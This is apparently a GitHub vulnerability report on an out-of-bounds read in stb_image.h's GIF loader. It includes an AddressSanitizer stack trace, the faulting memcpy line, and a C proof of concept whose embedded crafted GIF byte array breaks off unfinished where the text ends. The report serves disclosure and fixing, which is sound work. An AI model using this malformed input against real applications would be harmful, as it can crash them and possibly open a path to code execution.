Out-of-bounds Memory Access in stb_image Library during GIF Image Processing #1620

Open
jsnv-dev opened this issue Mar 9, 2024 · 0 comments

Out-of-bounds Memory Access in stb_image Library during GIF Image Processing

Summary

An out-of-bounds memory access has been discovered in the stb_image.h library. This issue arises while processing GIF images loaded from memory, leading to a segmentation fault. This vulnerability may result in a denial of service (DoS) or could be exploited to execute arbitrary code.

Affected Component

The vulnerability affects the processing routines within the stb_image.h library that handle GIF images, specifically within the context of the stbi_load_gif_from_memory function.

SEGV Details

AddressSanitizer:DEADLYSIGNAL
=================================================================
==123==ERROR: AddressSanitizer: SEGV on unknown address 0x62ffffff6a28 (pc 0x707570258c23 bp 0x7ffdc3aa7d60 sp 0x7ffdc3aa7528 T0)
==123==The signal is caused by a READ memory access.
    #0 0x707570258c23  (/lib/x86_64-linux-gnu/libc.so.6+0xbbc23) (BuildId: eebe5d5f4b608b8a53ec446b63981bba373ca0ca)
    #1 0x49ca08 in __asan_memcpy /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
    #2 0x51b38c in stbi__gif_load_next /dev/shm/./stb_image.h:6815:16
    #3 0x4db9a9 in stbi__load_gif_main /dev/shm/./stb_image.h:6981:14
    #4 0x4db3ea in stbi_load_gif_from_memory /dev/shm/./stb_image.h:1449:30
    #5 0x4e0d31 in main /dev/shm/poc.c:208:26
    #6 0x7075701c1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: eebe5d5f4b608b8a53ec446b63981bba373ca0ca)
    #7 0x41c3ad in _start (/dev/shm/poc+0x41c3ad)

The issue is triggered by an out-of-bounds memory access during GIF image processing. The vulnerability is highlighted in the following segments of the code, as outlined by the stack trace:

  • stbi__gif_load_next (Line 6815):

    • Code snippet: memcpy( &g->out[pi * 4], &two_back[pi * 4], 4 );
    • Issue: Attempts to copy data for GIF processing without adequate bounds checking, leading to potential out-of-bounds access.
  • stbi__load_gif_main (Line 6981):

    • Code snippet: u = stbi__gif_load_next(s, &g, comp, req_comp, two_back);
    • Issue: Invokes stbi__gif_load_next, propagating the handling of potentially malformed or unexpected GIF data that could lead to unsafe memory operations.
  • stbi_load_gif_from_memory (Line 1449):

    • Code snippet: result = (unsigned char*) stbi__load_gif_main(&s, delays, x, y, z, comp, req_comp);
    • Issue: The GIF loading process begins, passing through critical data that, if not properly validated or managed, results in out-of-bounds memory access.

Steps to Reproduce

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define STB_IMAGE_IMPLEMENTATION
#include "stb_image.h"

int main(void) {
    int width, height, comp, frames;
    int *delays = NULL;

    unsigned char data[] = {
        0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x4f, 0x00, 0x44, 0x00, 0xd5, 0x00, 0x00, 0xff, 0xff, 0xff, 
        0xf4, 0xf2, 0xf1, 0xde, 0xde, 0xde, 0xcf, 0xce, 0xcc, 0xbf, 0xbe, 0xbc, 0xfe, 0x94, 0x3b, 0xa2, 
        0xa1, 0xa0, 0xe2, 0x83, 0x31, 0x88, 0x83, 0x80, 0xf3, 0x5f, 0x5f, 0xcc, 0x6b, 0x2e, 0x77, 0x6f, 
        0x6a, 0xa5, 0x5d, 0x28, 0x66, 0x63, 0x63, 0xff, 0x3a, 0x29, 0x6e, 0x58, 0x51, 0xe8, 0x37, 0x29, 
        0x83, 0x52, 0x2d, 0xa0, 0x38, 0x34, 0xc5, 0x2d, 0x21, 0x48, 0x48, 0x48, 0x74, 0x3c, 0x27, 0xa5, 
        0x1e, 0x16, 0x85, 0x22, 0x1a, 0x37, 0x35, 0x33, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xff, 
        0xff, 0x3c, 0x0e, 0x08, 0x1d, 0x13, 0x10, 0x0e, 0x0c, 0x0a, 0x00, 0x00, 0x00, 0xfe, 0x01, 0x02, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x21, 0xff, 0x0b, 
        0x4e, 0x45, 0x54, 0x53, 0x43, 0x41, 0x50, 0x45, 0x32, 0x2e, 0x30, 0x03, 0x01, 0x00, 0x00, 0x00, 
        0x21, 0xf9, 0x04, 0x04, 0x08, 0x00, 0xff, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x4f, 0x00, 0x44, 
        0x00, 0x00, 0x06, 0xff, 0x40, 0x80, 0x70, 0x48, 0x2c, 0x1a, 0x8f, 0xc8, 0xa4, 0x72, 0xc9, 0x6c, 
        0x3a, 0x9f, 0xd0, 0xa8, 0x74, 0x4a, 0xad, 0x5a, 0xa1, 0x01, 0x01, 0xc1, 0x80, 0xe8, 0x7a, 0xbb, 
        0x84, 0x41, 0xe0, 0x4a, 0x7e, 0x0e, 0x16, 0x18, 0xcd, 0x67, 0xcd, 0x6e, 0x7f, 0x3a, 0x18, 0x8a, 
        0x41, 0x30, 0x2e, 0xdb, 0x87, 0x01, 0x42, 0x43, 0xed, 0xee, 0xf7, 0x3b, 0x0d, 0x04, 0x75, 0x77, 
        0x57, 0x02, 0x0b, 0x1e, 0x7e, 0x89, 0x89, 0x14, 0x04, 0x84, 0x56, 0x02, 0x18, 0x8a, 0x92, 0x7e, 
        0x1a, 0x06, 0x83, 0x8e, 0x4f, 0x90, 0x93, 0x9b, 0x6e, 0x1e, 0x08, 0x97, 0x98, 0x4b, 0x9a, 0x9c, 
        0xa4, 0x6c, 0x9f, 0xa1, 0x4c, 0xa3, 0xa5, 0xa5, 0x9e, 0xa8, 0x4a, 0x01, 0x0d, 0xab, 0xb2, 0x6f, 
        0x8d, 0xae, 0x47, 0x06, 0x93, 0x1e, 0x1a, 0x7c, 0x7f, 0x1a, 0x1d, 0x93, 0x14, 0x02, 0xb6, 0x45, 
        0x02, 0xbf, 0x8a, 0x18, 0x03, 0x02, 0x02, 0x08, 0x88, 0x6d, 0x0d, 0xca, 0x02, 0xb1, 0x92, 0x08, 
        0xc3, 0x78, 0xd2, 0x8a, 0x06, 0xd6, 0x6d, 0x1d, 0xc2, 0x42, 0x03, 0xc6, 0x89, 0x18, 0xdd, 0xc3, 
        0x04, 0x93, 0x1a, 0xe3, 0x00, 0xe5, 0xa6, 0x45, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x06, 0x00, 
        0x0b, 0x00, 0x41, 0x00, 0x32, 0x00, 0x00, 0x06, 0xff, 0x40, 0x90, 0x70, 0x48, 0x2c, 0x1a, 0x8b, 
        0x18, 0x04, 0x82, 0x72, 0x04, 0x25, 0x11, 0x0d, 0x4f, 0x73, 0x4a, 0xad, 0x4e, 0x29, 0x02, 0x00, 
        0x40, 0xd0, 0x30, 0x62, 0xb5, 0x00, 0x83, 0x75, 0x4c, 0x6e, 0x1a, 0xc0, 0x80, 0x81, 0xa6, 0x78, 
        0x06, 0x07, 0x30, 0xe5, 0x38, 0x99, 0x12, 0x40, 0x03, 0x16, 0x44, 0xba, 0x1d, 0x21, 0xef, 0x53, 
        0x11, 0x68, 0x04, 0x01, 0x46, 0x02, 0x14, 0x6d, 0x00, 0x04, 0x7e, 0x8a, 0x46, 0x04, 0x60, 0x14, 
        0x1f, 0x06, 0x02, 0x1a, 0x1f, 0x94, 0x89, 0x1f, 0x18, 0x60, 0x92, 0x8b, 0x9b, 0x20, 0x8d, 0x00, 
        0x01, 0x94, 0x0b, 0x02, 0x70, 0x20, 0x1e, 0x04, 0x8f, 0x1f, 0x99, 0x6b, 0x9c, 0x8a, 0x9e, 0x04, 
        0x94, 0x58, 0xa4, 0xa6, 0x0d, 0x94, 0xaa, 0xac, 0x8a, 0x80, 0x5a, 0x52, 0x08, 0x6a, 0x42, 0x1e, 
        0x08, 0x62, 0xb9, 0x69, 0x52, 0xb7, 0x7d, 0x0d, 0x75, 0x69, 0x80, 0x06, 0xc4, 0x20, 0xc7, 0x76, 
        0x62, 0xc5, 0x7d, 0xa6, 0x68, 0x85, 0x44, 0x18, 0x03, 0x76, 0x5d, 0xd1, 0x7d, 0x18, 0x59, 0x9f, 
        0x0b, 0x1d, 0x45, 0x0d, 0xde, 0x61, 0xe1, 0xdb, 0x7d, 0x14, 0x04, 0x04, 0xe0, 0x46, 0x1e, 0x0d, 
        0xea, 0x06, 0xe6, 0xe7, 0xf3, 0xf4, 0xac, 0x1f, 0x54, 0xf2, 0xf5, 0x53, 0x1d, 0x11, 0x0c, 0x0a, 
        0xff, 0x00, 0x15, 0x50, 0x39, 0xf0, 0x8f, 0x81, 0xc1, 0x08, 0x1c, 0xf4, 0x11, 0x51, 0x50, 0xa0, 
        0x61, 0x01, 0x39, 0x05, 0x08, 0xfe, 0xab, 0xa0, 0x70, 0x08, 0x83, 0x86, 0x7e, 0x0a, 0x04, 0xa4, 
        0x58, 0xf1, 0x03, 0x07, 0x81, 0x8b, 0x22, 0xfc, 0xe3, 0x70, 0xaf, 0x23, 0x87, 0x08, 0x7d, 0x0e, 
        0x80, 0xe0, 0x48, 0xb2, 0x22, 0x11, 0x66, 0x64, 0x40, 0x4a, 0x81, 0xe9, 0xb2, 0xa6, 0xcd, 0x22, 
        0x09, 0xf5, 0x09, 0xb8, 0xc9, 0xd3, 0x26, 0xa9, 0x87, 0x26, 0x00, 0x39, 0xc4, 0x28, 0xbd, 0xa5, 
        0xfa, 0xfe, 0x08, 0xa8, 0x60, 0x95, 0x48, 0x87, 0x08, 0x1c, 0x3a, 0xd0, 0x92, 0xda, 0xa1, 0x2f, 
        0x87, 0xbf, 0x7f, 0x1f, 0x48, 0xa3, 0x46, 0xe1, 0x6e, 0x04, 0x27, 0x15, 0x9c, 0x26, 0xb2, 0xc0, 
        0x01, 0x49, 0x85, 0x02, 0x05, 0x14, 0x30, 0x78, 0x40, 0x99, 0xc1, 0x81, 0xcb, 0x90, 0x33, 0x1f, 
        0x88, 0x50, 0x99, 0x81, 0x82, 0xcf, 0x94, 0xe2, 0xfe, 0xb9, 0x70, 0x44, 0x4d, 0xe6, 0xd3, 0xa8, 
        0x53, 0x67, 0xfe, 0x2c, 0x39, 0xf4, 0x91, 0x0a, 0x7e, 0x1e, 0x58, 0x80, 0xd0, 0xf8, 0x26, 0x6c, 
        0x3f, 0x07, 0x58, 0x57, 0x48, 0x36, 0xc4, 0xc3, 0x06, 0x0b, 0x12, 0xe3, 0x18, 0x98, 0x20, 0xc4, 
        0x42, 0x1a, 0x70, 0x79, 0x18, 0x80, 0x38, 0x10, 0xe7, 0x73, 0x85, 0x08, 0x69, 0x8c, 0x6c, 0xc8, 
        0x74, 0xe1, 0x38, 0x38, 0x0f, 0x15, 0x2a, 0x28, 0x17, 0x93, 0x3b, 0xbb, 0x75, 0x70, 0xd3, 0x33, 
        0x39, 0x30, 0x8e, 0x9c, 0x4d, 0x07, 0xec, 0xcc, 0xa1, 0x74, 0xff, 0x0e, 0x3e, 0xc3, 0x10, 0xd2, 
        0xc2, 0x85, 0x10, 0x97, 0xff, 0x0b, 0x1c, 0x07, 0xcb, 0x4e, 0x24, 0x73, 0x28, 0xcf, 0xc6, 0x37, 
        0x23, 0x01, 0x0d, 0x6c, 0xe0, 0x80, 0x03, 0x45, 0x5c, 0xe0, 0x5a, 0x23, 0x1f, 0xdc, 0xa7, 0x40, 
        0x7a, 0x42, 0x28, 0x80, 0x57, 0x74, 0x55, 0xd5, 0x56, 0xd5, 0x59, 0x4f, 0xf4, 0x02, 0x02, 0x27, 
        0x10, 0x00, 0x37, 0x04, 0x04, 0x17, 0xec, 0xc7, 0xff, 0x1f, 0x1b, 0x80, 0x01, 0xf6, 0x21, 0x07, 
        0x17, 0x68, 0xa8, 0x21, 0x08, 0xc6, 0x81, 0x60, 0x94, 0x14, 0xf5, 0x10, 0x01, 0x81, 0x11, 0x19, 
        0x6e, 0xc0, 0x41, 0x5d, 0x51, 0x78, 0x40, 0xe2, 0x8b, 0xc5, 0x81, 0x90, 0x41, 0x06, 0x1b, 0x74, 
        0xf0, 0xcc, 0x35, 0x50, 0x10, 0x70, 0x20, 0x08, 0x1d, 0x9c, 0x68, 0x84, 0x03, 0x10, 0x4c, 0xd0, 
        0xa1, 0x84, 0x48, 0x0c, 0x29, 0xdf, 0x06, 0x1b, 0xb8, 0x77, 0x21, 0x72, 0x06, 0x3c, 0x21, 0xe4, 
        0x11, 0x1e, 0xc0, 0x17, 0x05, 0x8e, 0x47, 0x70, 0x49, 0xc4, 0x7c, 0x20, 0xc8, 0xc8, 0x9b, 0x10, 
        0x4d, 0x21, 0xa1, 0x54, 0x4e, 0x87, 0x8d, 0x42, 0x1a, 0x70, 0x17, 0xc0, 0xd5, 0x48, 0x03, 0x0b, 
        0x81, 0x70, 0xcb, 0x98, 0x6d, 0x05, 0x27, 0x01, 0x98, 0x91, 0x10, 0x08, 0xc2, 0x03, 0x06, 0x50, 
        0x48, 0x48, 0x95, 0x45, 0x10, 0xe5, 0x04, 0x9c, 0x43, 0x58, 0x70, 0x01, 0x9e, 0x83, 0xdc, 0x36, 
        0xc0, 0xa2, 0x63, 0x95, 0x39, 0xc4, 0x99, 0x64, 0x00, 0x67, 0xc1, 0x04, 0x5e, 0xc6, 0x31, 0x00, 
        0x36, 0x9b, 0xbc, 0x22, 0x96, 0x10, 0x0b, 0xd0, 0x39, 0xc4, 0x4a, 0x46, 0x94, 0x08, 0xc1, 0xa8, 
        0xa3, 0xc2, 0x38, 0x81, 0x04, 0x11, 0xbc, 0xe1, 0x04, 0xa8, 0x20, 0x7c, 0xb0, 0xa2, 0x44, 0x6e, 
        0x1a, 0x11, 0x27, 0x11, 0x48, 0xb2, 0xb4, 0x00, 0x65, 0xb8, 0x3e, 0x80, 0x00, 0x01, 0x02, 0xcc, 
        0x4a, 0xc4, 0xa6, 0x46, 0x00, 0x23, 0x84, 0xa0, 0x4e, 0x00, 0x4b, 0x46, 0x3b, 0xc8, 0x52, 0x23, 
        0x85, 0x4d, 0x01, 0x1c, 0x84, 0x88, 0x96, 0x99, 0x18, 0xc0, 0xea, 0x07, 0xe7, 0x64, 0x85, 0x48, 
        0xa5, 0x5a, 0xfd, 0xd9, 0x50, 0xb6, 0x4f, 0x01, 0x43, 0x14, 0x72, 0x14, 0xc4, 0xea, 0x84, 0x9e, 
        0xdc, 0xfe, 0xc2, 0x0a, 0x72, 0x86, 0xb0, 0x5a, 0xa9, 0xee, 0x11, 0x3a, 0x35, 0x32, 0xd5, 0x33, 
        0x1e, 0xec, 0xa5, 0xc8, 0xa7, 0x45, 0x18, 0xf9, 0x14, 0xa0, 0xe7, 0x48, 0x4b, 0x65, 0x2f, 0x1a, 
        0xec, 0x91, 0x96, 0x41, 0xed, 0x1e, 0x31, 0xdb, 0x97, 0x0f, 0x74, 0x22, 0x10, 0x35, 0x08, 0x60, 
        0xa1, 0xc1, 0x02, 0x61, 0x28, 0xf1, 0x2f, 0x33, 0x57, 0x16, 0x9b, 0xab, 0x9f, 0x7f, 0xe8, 0xf4, 
        0xd3, 0x2e, 0x01, 0x38, 0x0c, 0x42, 0xb2, 0x00, 0x6c, 0x0a, 0x6a, 0x37, 0xd1, 0x1e, 0x31, 0xce, 
        0x13, 0x2f, 0xad, 0x6b, 0x04, 0xc5, 0x51, 0x00, 0x10, 0xb1, 0xc9, 0x9e, 0x20, 0x02, 0x90, 0xc9, 
        0x5e, 0x79, 0x00, 0x28, 0x22, 0xea, 0x7c, 0xc2, 0x72, 0x24, 0x20, 0xd9, 0x5c, 0x89, 0x62, 0x20, 
        0x54, 0x80, 0x40, 0x59, 0x83, 0x30, 0xc0, 0x09, 0x06, 0x33, 0x23, 0xa2, 0x98, 0x07, 0x69, 0x32, 
        0xb0, 0x00, 0xd0, 0x7e, 0x28, 0x50, 0x1b, 0x25, 0x3c, 0x33, 0xb2, 0xdd, 0x10, 0x11, 0x14, 0x9d, 
        0x89, 0xba, 0x50, 0xc8, 0x23, 0x06, 0xd3, 0x83, 0x38, 0x29, 0x46, 0xd4, 0x37, 0xff, 0x61, 0x46, 
        0xd8, 0x63, 0x0c, 0x8d, 0xc1, 0xd9, 0x67, 0x93, 0xed, 0x87, 0x72, 0x18, 0x5c, 0x81, 0xf5, 0x20, 
        0x41, 0x00, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 
        0x01, 0x00, 0x01, 0x00, 0x82, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 
        0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 
        0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 0x0b, 0x00, 
        0x17, 0x00, 0x0f, 0x00, 0x00, 0x06, 0x93, 0x40, 0x10, 0xc8, 0x83, 0x29, 0x7a, 0x84, 0xc8, 0xa4, 
        0xa6, 0xa8, 0x49, 0x7a, 0x28, 0x8d, 0x28, 0xe5, 0x98, 0x14, 0x62, 0xa2, 0x51, 0x0c, 0xf2, 0x8a, 
        0x6d, 0x68, 0xab, 0x9e, 0x6e, 0xf4, 0x18, 0x16, 0x37, 0xa8, 0x5b, 0x2c, 0xd4, 0x0b, 0xba, 0x52, 
        0xde, 0x6f, 0x36, 0xf2, 0x09, 0x45, 0x2c, 0xe0, 0xcf, 0x06, 0x82, 0x40, 0x58, 0x34, 0x28, 0x5f, 
        0x42, 0x1a, 0x0b, 0x06, 0x08, 0x00, 0x20, 0x02, 0x06, 0x0d, 0x83, 0x02, 0x42, 0x0b, 0x42, 0x89, 
        0x55, 0x48, 0x0d, 0x48, 0x01, 0x60, 0x92, 0x98, 0x55, 0x06, 0x99, 0x9c, 0x48, 0x8d, 0x8f, 0x82, 
        0x42, 0x04, 0x92, 0x04, 0x1f, 0x1f, 0xa0, 0x49, 0x96, 0x20, 0x06, 0x1f, 0x1a, 0xaa, 0x48, 0x1f, 
        0x7d, 0x14, 0x8d, 0x42, 0x06, 0x1d, 0x20, 0x7a, 0x7c, 0x76, 0x67, 0x55, 0x18, 0x0b, 0x7c, 0x04, 
        0x08, 0x72, 0x1a, 0x70, 0x6f, 0x4d, 0x60, 0xc5, 0x7f, 0x54, 0x44, 0x58, 0x81, 0x55, 0xc4, 0x52, 
        0xc7, 0x42, 0x11, 0x15, 0xd5, 0x11, 0x9d, 0xd6, 0x48, 0x41, 0x00, 0x21, 0xf9, 0x04, 0xb5, 0x05, 
        0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 0x0e, 0x00, 0x17, 0x00, 0x31, 0x00, 0x00, 0x06, 0x78, 
        0x40, 0x90, 0x70, 0x48, 0x2c, 0x0e, 0x1b, 0x44, 0x4d, 0x63, 0xc9, 0x6c, 0x68, 0x8c, 0xcd, 0xa5, 
        0x10, 0x13, 0x95, 0x12, 0x3d, 0xd5, 0xa5, 0x87, 0x92, 0xa5, 0x10, 0x3b, 0xd9, 0x46, 0x87, 0x5b, 
        0xf5, 0x0e, 0xc1, 0xd9, 0x31, 0x99, 0x49, 0xc1, 0x5c, 0xd7, 0x6c, 0x0f, 0xc6, 0xa3, 0xa1, 0xd8, 
        0x35, 0x9f, 0xe7, 0xd0, 0xf3, 0xc9, 0x63, 0xfe, 0x7c, 0x79, 0x0d, 0x18, 0x1d, 0x85, 0x54, 0x6e, 
        0x44, 0x5c, 0x7f, 0x7f, 0x76, 0x1f, 0x5b, 0x51, 0x66, 0x49, 0x01, 0x00, 0x01, 0x1f, 0x51, 0x45, 
        0x93, 0x46, 0x42, 0x4c, 0x96, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, 0xa0, 0xa1, 0xa2, 0xa3, 
        0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, 0xb0, 0xb1, 0xb2, 0xb3, 
        0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xbb, 0x9f, 0x0b, 0x44, 0x41, 0x00, 0x21, 0xf9, 0x04, 
        0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 0x0b, 0x00, 0x17, 0x00, 0x34, 0x00, 0x00, 0x06, 
        0xc6, 0x40, 0x10, 0x48, 0x83, 0x28, 0x6a, 0x84, 0xc8, 0x64, 0xa3, 0xd8, 0x48, 0x62, 0x06, 0x80, 
        0xe8, 0x00, 0x93, 0x44, 0x22, 0x02, 0xd1, 0x00, 0x02, 0x69, 0x88, 0x7a, 0x0d, 0x55, 0x10, 0x46, 
        0xe0, 0x05, 0x08, 0xa8, 0xe3, 0xb2, 0x99, 0x9a, 0x44, 0xa8, 0x01, 0xdb, 0xc6, 0x1b, 0xd0, 0x44, 
        0x76, 0x06, 0x01, 0xa8, 0x77, 0xd0, 0xe9, 0x46, 0x05, 0x14, 0x14, 0x00, 0x60, 0x48, 0x18, 0x01, 
        0x1a, 0x1f, 0x7e, 0x00, 0x01, 0x18, 0x04, 0xa2, 0x77, 0xe1, 0x04, 0x04, 0x4e, 0x04, 0x1f, 0x1f, 
        0x82, 0x5e, 0x8d, 0x5e, 0x96, 0x1f, 0x04, 0x93, 0x85, 0x08, 0x96, 0x18, 0x65, 0x9a, 0x51, 0x9c, 
        0x9e, 0x4e, 0x06, 0xa2, 0xa4, 0x6e, 0x51, 0x20, 0x96, 0x02, 0x5b, 0x48, 0x1a, 0x53, 0x1e, 0x8e, 
        0x7f, 0x1a, 0x98, 0x8b, 0x08, 0x5d, 0x14, 0x49, 0x1e, 0x7a, 0x65, 0x03, 0x1e, 0x77, 0x6a, 0x7c, 
        0x55, 0x0b, 0x6f, 0x0b, 0x42, 0x14, 0x58, 0x59, 0x75, 0x49, 0xb4, 0xc2, 0x47, 0x20, 0x1d, 0x57, 
        0xbb, 0x61, 0x42, 0x0f, 0x64, 0x66, 0xbe, 0x48, 0x0c, 0x0f, 0xe1, 0x0c, 0xd9, 0x48, 0xe2, 0xe4, 
        0xe7, 0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, 0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 
        0xf7, 0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff, 0x00, 0x03, 0x0a, 0x1c, 0x48, 0xb0, 0xa0, 
        0xc1, 0x83, 0xee, 0xa0, 0x81, 0x08, 0x02, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 
        0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 
        0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 0x0b, 0x00, 0x17, 0x00, 0x0f, 
        0x00, 0x00, 0x06, 0x93, 0x40, 0x10, 0xc8, 0x83, 0x29, 0x7a, 0x84, 0xc8, 0xa4, 0xa6, 0xa8, 0x49, 
        0x7a, 0x28, 0x8d, 0x28, 0xe5, 0x98, 0x14, 0x62, 0xa2, 0x51, 0x0c, 0xf2, 0x8a, 0x6d, 0x68, 0xab, 
        0x9e, 0x6e, 0xf4, 0x18, 0x16, 0x37, 0xa8, 0x5b, 0x2c, 0xd4, 0x0b, 0xba, 0x52, 0xde, 0x6f, 0x36, 
        0xf2, 0x09, 0x45, 0x2c, 0xe0, 0xcf, 0x06, 0x82, 0x40, 0x58, 0x34, 0x28, 0x5f, 0x42, 0x1a, 0x0b, 
        0x06, 0x08, 0x00, 0x20, 0x02, 0x06, 0x0d, 0x83, 0x02, 0x42, 0x0b, 0x42, 0x89, 0x55, 0x48, 0x0d, 
        0x48, 0x01, 0x60, 0x92, 0x98, 0x55, 0x06, 0x99, 0x9c, 0x48, 0x8d, 0x8f, 0x82, 0x42, 0x04, 0x92, 
        0x04, 0x1f, 0x1f, 0xa0, 0x49, 0x96, 0x20, 0x06, 0x1f, 0x1a, 0xaa, 0x48, 0x1f, 0x7d, 0x14, 0x8d, 
        0x42, 0x06, 0x1d, 0x20, 0x7a, 0x7c, 0x76, 0x67, 0x55, 0x18, 0x0b, 0x7c, 0x04, 0x08, 0x72, 0x1a, 
        0x70, 0x6f, 0x4d, 0x60, 0xc5, 0x7f, 0x54, 0x44, 0x58, 0x81, 0x55, 0xc4, 0x52, 0xc7, 0x42, 0x11, 
        0x15, 0xd5, 0x11, 0x9d, 0xd6, 0x48, 0x41, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 
        0x2c, 0x1d, 0x00, 0x0e, 0x00, 0x17, 0x00, 0x31, 0x00, 0xfe, 0xff, 0xff, 0xff, 0x90, 0x70, 0x48, 
        0x2c, 0x0e, 0x1b, 0x44, 0x4d, 0x63, 0xc9, 0x6c, 0x68, 0x8c, 0xcd, 0xa5, 0x10, 0x13, 0x95, 0x12, 
        0x3d, 0xd5, 0xa5, 0x87, 0x92, 0xa5, 0x10, 0x3b, 0xd9, 0x46, 0x87, 0x5b, 0xf5, 0x0e, 0xc1, 0xd9, 
        0x31, 0x99, 0x49, 0xc1, 0x5c, 0xd7, 0x6c, 0x0f, 0xc6, 0xa3, 0xa1, 0xd8, 0x35, 0x9f, 0xe7, 0xd0, 
        0xf3, 0xc9, 0x63, 0xfe, 0x7c, 0x79, 0x0d, 0x18, 0x1d, 0x85, 0x54, 0x6e, 0x44, 0x5c, 0x7f, 0x7f, 
        0x76, 0x1f, 0x5b, 0x51, 0x66, 0x49, 0x51, 0x45, 0x93, 0x46, 0x42, 0x4c, 0x96, 0x99, 0x9a, 0x9b, 
        0x9c, 0x9d, 0x9e, 0x9f, 0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xab, 
        0xac, 0xad, 0xae, 0xaf, 0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xbb, 
        0x9f, 0x0b, 0x44, 0x41, 0x00, 0x21, 0xf9, 0x04, 0x2e, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 
        0x0b, 0x00, 0x17, 0x00, 0x34, 0x00, 0x00, 0x06, 0xc6, 0x40, 0x10, 0x48, 0x83, 0x28, 0x6a, 0x84, 
        0xc8, 0x64, 0xa3, 0xd8, 0x48, 0x62, 0x06, 0x80, 0xe8, 0x00, 0x93, 0x44, 0x22, 0x02, 0xd1, 0x00, 
        0x02, 0x69, 0x88, 0x7a, 0x0d, 0x55, 0x10, 0x46, 0xe0, 0x05, 0x08, 0xa8, 0xe3, 0xb2, 0x99, 0x9a, 
        0x44, 0xa8, 0x01, 0xdb, 0xc6, 0x1b, 0xd0, 0x44, 0x76, 0x06, 0x01, 0xa8, 0x77, 0xd0, 0xe9, 0x46, 
        0x05, 0x14, 0x14, 0x00, 0x60, 0x48, 0x18, 0x01, 0x1a, 0x1f, 0x7e, 0x00, 0x01, 0x18, 0x04, 0x5e, 
        0x88, 0x1f, 0x03, 0x04, 0x4e, 0x04, 0x1f, 0x1f, 0x82, 0x5e, 0x8d, 0x5e, 0x96, 0x1f, 0x04, 0x93, 
        0x85, 0x08, 0x96, 0x18, 0x65, 0x9a, 0x51, 0x9c, 0x9e, 0x4e, 0x06, 0xa2, 0xa4, 0x6e, 0x51, 0x20, 
        0x96, 0x02, 0x5b, 0x48, 0x1a, 0x53, 0x1e, 0x8e, 0x7f, 0x1a, 0x98, 0x8b, 0x08, 0x5d, 0x14, 0x49, 
        0x1e, 0x7a, 0x65, 0x03, 0x1e, 0x77, 0x6a, 0x7c, 0x55, 0x0b, 0x6f, 0x0b, 0x42, 0x14, 0x58, 0x59, 
        0x75, 0x49, 0xb4, 0xc2, 0x47, 0x20, 0x1d, 0x57, 0xbb, 0x61, 0x42, 0x0f, 0x64, 0x66, 0xbe, 0x48, 
        0x0c, 0x0f, 0xe1, 0x0c, 0xd9, 0x48, 0xe2, 0xe4, 0xe7, 0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 
        0xef, 0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, 0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 
        0xff, 0x00, 0x03, 0x0a, 0x1c, 0x48, 0xb0, 0xa0, 0xc1, 0x83, 0xee, 0xa0, 0x81, 0x08, 0x02, 0x00, 
        0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 
